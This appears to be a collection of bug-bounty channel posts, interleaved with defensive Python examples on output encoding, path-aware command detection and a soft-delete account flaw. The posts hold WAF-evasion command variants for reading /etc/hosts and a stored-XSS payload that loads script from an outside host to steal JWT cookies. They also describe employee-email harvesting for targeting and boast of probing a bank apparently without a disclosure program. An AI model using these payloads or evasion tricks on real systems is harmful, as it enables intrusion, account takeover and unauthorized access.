This is really cool
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
Bypass Series for bug hunters
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts
cat ${PWD}/../../../etc/hosts
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one; it's really awesome!
Follow me: DarkShadow
#Bugbountytips #series@brutsecurity
Bash Series for bug hunters
Part-2
Create multiple folders using one-liner:
mkdir {dev,test,prod}
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txt
This creates the files file1.txt, file2.txt and file3.txt.
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txt
This creates the files file01.txt, file02.txt, file03.txt ... file10.txt.
Boost your bug hunting with pro Bash commands, a must for every hacker!
Don't forget to react
Follow me: DarkShadow
#Bugbountytips #series@brutsecurity
program-list.json
1.1 MB
Helpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format; the JSON file is attached above.
Don't forget to react
Follow me: DarkShadow
#BugBountytips
Popular HackerOne target Agoda.com was vulnerable to Stored XSS, rewarded $3,200
Core Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
Affected Functionality:
Property listing creation, including:
• Property Name
• Property Description
• Company Name
• Company Address
Injection Payload:
"><script src=https://hackbx.bxss.in></script>
This single payload can be used to execute thousands of XSS scripts.
Impact:
On page load, the stored XSS steals the user's JWT token from cookies, enabling full account takeover with zero user interaction.
Follow me: DarkShadow
#BugBountytips
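The write-up above makes two points a defender should take away: validation that lives only in the browser never runs for a request sent directly, and a JWT readable from document.cookie is what turns a stored XSS into account takeover. The following is an added example (not Agoda's code and not the channel's) that models a property-listing renderer both ways and the cookie attribute that closes the token-theft path. The function names, the markup, and the "nice flat" description are constructed for this illustration; the payload string is the one quoted in the post, used only as test input.

```python
import html

# The payload quoted in the write-up above, used here only as constructed test input.
PAYLOAD = '"><script src=https://hackbx.bxss.in></script>'


def client_side_check(value: str) -> bool:
    """Front-end-only validation as the write-up describes.

    The browser runs this before submitting the form, but a request sent directly
    to the backend never executes it, so nothing in the server path below relies on it.
    """
    return "<" not in value and ">" not in value


def render_listing_unsafe(name: str, description: str) -> str:
    """Vulnerable: stored fields are interpolated into HTML unchanged."""
    return (
        f'<div class="property"><h2 title="{name}">{name}</h2>'
        f"<p>{description}</p></div>"
    )


def render_listing_safe(name: str, description: str) -> str:
    """Hardened: every stored value is HTML-encoded at the point of output.

    html.escape(quote=True) also encodes the double quote, so the payload's leading
    '">' cannot break out of the title attribute, and '<' becomes '&lt;'.
    """
    safe_name = html.escape(name, quote=True)
    safe_desc = html.escape(description, quote=True)
    return (
        f'<div class="property"><h2 title="{safe_name}">{safe_name}</h2>'
        f"<p>{safe_desc}</p></div>"
    )


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to compare the two renderers."""
    return "<script" in markup.lower()


def session_cookie_header(jwt: str) -> str:
    """Set-Cookie value for the session JWT (hypothetical cookie name 'session').

    HttpOnly keeps document.cookie from exposing the token to injected script, which
    removes the account-takeover path the write-up describes even if an XSS slips
    through; Secure and SameSite narrow exposure further.
    """
    return f"session={jwt}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print("client-side check rejects payload:", not client_side_check(PAYLOAD))
    print("unsafe render:", render_listing_unsafe(PAYLOAD, "nice flat"))
    print("safe render:  ", render_listing_safe(PAYLOAD, "nice flat"))
    print("cookie:", session_cookie_header("<jwt-placeholder>"))
```

Output encoding at render time is the fix for the injection itself; the HttpOnly flag is the compensating control for the impact the post describes, and both belong in place regardless of what the front end checks.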
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments; I'd love to hear your feedback and what you'd like to see next!
We enabled copyright protection because many people keep copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they don't even mention or credit us after copying our content.
Bypass Series for bug hunters
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tar cf - /etc/hosts | tar xf - -O
gzip -c /etc/hosts | gzip -d
less /e*c/h*st*
more /e{t,c}*/{o,h}*s*{s,t}
strings /??c/??sts
sort /etc/hosts | uniq
Guys, these are some custom payloads I personally crafted, highly effective at bypassing firewalls and evading detection.
For more, follow me: DarkShadow
#Bugbountytips #series@brutsecurity
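Every variant in Part-4 and Part-5 above defeats the same kind of rule: a signature that keys on the command name and the literal path together. The lesson for whoever writes the rule is to match on the resource being referenced, after undoing the obfuscations, and to ignore which utility reads it. The following is an added example (not the channel's code) of such a path-aware check, covering both posts: it substitutes placeholder values for shell variables, expands brace groups, folds `..` with posixpath.normpath, and matches the result as a glob against a list of sensitive files. The list of sensitive paths, the variable placeholders, and the sample command lines (taken from the two posts) are constructed for this illustration.

```python
import posixpath
import re
from fnmatch import fnmatchcase

# Files a web-facing process should never be asked to read. Constructed for this
# example; a real rule set would carry its own list.
SENSITIVE_PATHS = ["/etc/hosts", "/etc/passwd", "/etc/shadow"]

# Placeholder values for shell variables (assumed; a detector cannot know the real
# environment, so it resolves them to plausible absolute paths before normalising).
VAR_PLACEHOLDERS = {
    "${HOME}": "/home/user",
    "$HOME": "/home/user",
    "${PWD}": "/var/www/app",
    "$PWD": "/var/www/app",
    "~": "/home/user",
}

# The kind of signature the posts above defeat: command name plus literal path.
NAIVE_RULE = re.compile(r"\bcat\s+/etc/hosts\b")


def naive_rule_fires(command: str) -> bool:
    return NAIVE_RULE.search(command) is not None


def expand_braces(pattern: str) -> list[str]:
    """Expand {a,b,...} groups the way the shell does: '/e{t,c}*' -> ['/et*', '/ec*']."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[: m.start()], pattern[m.end():]
    expanded = []
    for alternative in m.group(1).split(","):
        expanded.extend(expand_braces(head + alternative + tail))
    return expanded


def referenced_sensitive_paths(command: str) -> list[str]:
    """Return the sensitive paths a command line refers to, however they are spelled.

    Each token that looks like a path goes through variable substitution, brace
    expansion and posixpath.normpath (which folds '..' segments); the result is
    matched as a glob against SENSITIVE_PATHS. The command name is ignored on
    purpose: rev, od, grep, cut, paste, tar, gzip, less, more, strings and sort
    all read the file just as well as cat.
    """
    hits: list[str] = []
    for token in re.split(r"[\s|;&]+", command):
        if not token.startswith(("/", "$", "~")):
            continue
        for var, value in VAR_PLACEHOLDERS.items():
            token = token.replace(var, value)
        for pattern in expand_braces(token):
            normalised = posixpath.normpath(pattern)
            for path in SENSITIVE_PATHS:
                if fnmatchcase(path, normalised) and path not in hits:
                    hits.append(path)
    return hits


# Constructed sample input: the variants listed in Part-4 and Part-5 above.
SAMPLE_COMMANDS = [
    "cat /etc/hosts",
    "rev /etc/hosts | rev",
    "od -An -c /etc/hosts | tr -d ' '",
    "cat $HOME/../../etc/hosts",
    "cat ${PWD}/../../../etc/hosts",
    'grep "" /etc/hosts',
    "cut -c1- /etc/hosts",
    "paste /etc/hosts",
    "tar cf - /etc/hosts | tar xf - -O",
    "gzip -c /etc/hosts | gzip -d",
    "less /e*c/h*st*",
    "more /e{t,c}*/{o,h}*s*{s,t}",
    "strings /??c/??sts",
    "sort /etc/hosts | uniq",
]


def coverage() -> tuple[int, int]:
    """(commands the naive rule catches, commands the path-aware check catches)."""
    naive = sum(naive_rule_fires(c) for c in SAMPLE_COMMANDS)
    aware = sum("/etc/hosts" in referenced_sensitive_paths(c) for c in SAMPLE_COMMANDS)
    return naive, aware


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(f"{cmd!r:42} naive={naive_rule_fires(cmd)!s:5} paths={referenced_sensitive_paths(cmd)}")
    print("coverage (naive, path-aware):", coverage())
```

Run as a script, the naive rule fires on one of the fourteen lines and the path-aware check on all of them. A string normaliser is still only a partial control: it guesses at variable values and cannot see what a real shell will do with further encodings, so the durable defences remain not passing user input to a shell at all and auditing reads of the sensitive files at the operating-system level, where the spelling of the command no longer matters.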
Only 6 hours... and boom!
Found multiple critical vulnerabilities in US Bank, including:
Leaked sensitive information
Hardcoded auth credentials
Unprotected sensitive endpoints
Unauthenticated access to the dashboard
And more juicy stuff...
Why aren't you guys following me yet?
It's like walking into a digital vault with no lock... just saying.
Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
Nuclei AI Prompts is a platform that offers a collection of ready-to-use security prompts for Nuclei. It helps penetration testers and security researchers speed up their work by providing prompts for common vulnerabilities like XSS, SQLi, RCE, and more. You can easily copy these prompts and use them in your security testing, and even contribute new ones to help grow the community.
Join Telegram - t.iss.one/brutsecurity
nucleiprompts.com
#cybersecurity #bugbounty #bugbountytips #nuclei
Discovering a Business Logic Flaw Bug (Low-Hanging Fruit)
Try this simple method of mine to identify a common business logic flaw:
But wait, before you continue...
If you're not following me yet, what are you doing?
Exploitation Steps:
1. Register a new account and take note of the username you used.
2. Verify and activate the account.
3. Delete the account.
4. Now, try registering again using the same username and observe what happens.
If the server still blocks or reserves the username after the account is deleted, congratulations! You've just uncovered a Business Logic Flaw bug.
#BugBountytips
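The root cause behind the behaviour those four steps look for is usually a soft delete: the account row is flagged rather than removed, and the uniqueness check on registration still sees the flagged row. The following is an added example (not the channel's code and not any real service's) that models the register / verify / delete lifecycle with a switch between the two designs, and a probe function that walks the four steps. The class and function names and the "probe_user" username are constructed for this illustration.

```python
from dataclasses import dataclass


@dataclass
class User:
    username: str
    verified: bool = False


class AccountService:
    """Minimal model of the register / verify / delete lifecycle in the steps above.

    release_on_delete=False reproduces the behaviour the post flags: a deleted
    account is only soft-deleted, the uniqueness check still sees its row, and the
    username can never be registered again. release_on_delete=True checks
    uniqueness against active accounts only. Hypothetical service for illustration.
    """

    def __init__(self, release_on_delete: bool) -> None:
        self.release_on_delete = release_on_delete
        self.active: dict[str, User] = {}   # username -> live account
        self.deleted: list[User] = []       # retained tombstones (audit trail)

    def username_taken(self, username: str) -> bool:
        if username in self.active:
            return True
        if self.release_on_delete:
            return False
        # Flawed variant: tombstones keep reserving their username indefinitely.
        return any(u.username == username for u in self.deleted)

    def register(self, username: str) -> bool:
        """Step 1; returns False for the usual 'username already taken' outcome."""
        if self.username_taken(username):
            return False
        self.active[username] = User(username)
        return True

    def verify(self, username: str) -> None:
        """Step 2: activate the account."""
        self.active[username].verified = True

    def delete(self, username: str) -> bool:
        """Step 3: soft-delete, keeping the record but removing it from the live set."""
        user = self.active.pop(username, None)
        if user is None:
            return False
        self.deleted.append(user)
        return True


def reregistration_probe(service: AccountService, username: str = "probe_user") -> bool:
    """Steps 1-4 from the post; True means the username could be registered again."""
    if not service.register(username):
        raise RuntimeError("constructed probe username unexpectedly taken")
    service.verify(username)
    service.delete(username)
    return service.register(username)


if __name__ == "__main__":
    print("soft delete, name reserved :", reregistration_probe(AccountService(release_on_delete=False)))
    print("name released on delete    :", reregistration_probe(AccountService(release_on_delete=True)))
```

Whether a freed username is the desired outcome is a product decision (some services hold handles after deletion to stop impersonation of the former owner), so a report on this behaviour should state which outcome the application's own account-deletion policy promises and show that the observed behaviour contradicts it.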
Collect emails and usernames from the commit history of an organization's GitHub repos for more personalized targeting of employees.
ghintel.secrets.ninja
What do you think is the most underrated vulnerability?
Anonymous Poll
1. Business Logic Flaws: 39%
2. Race Conditions: 16%
3. Vulnerabilities in package.json: 14%
4. Insecure Deserialization: 13%
5. HTTP Request Smuggling: 19%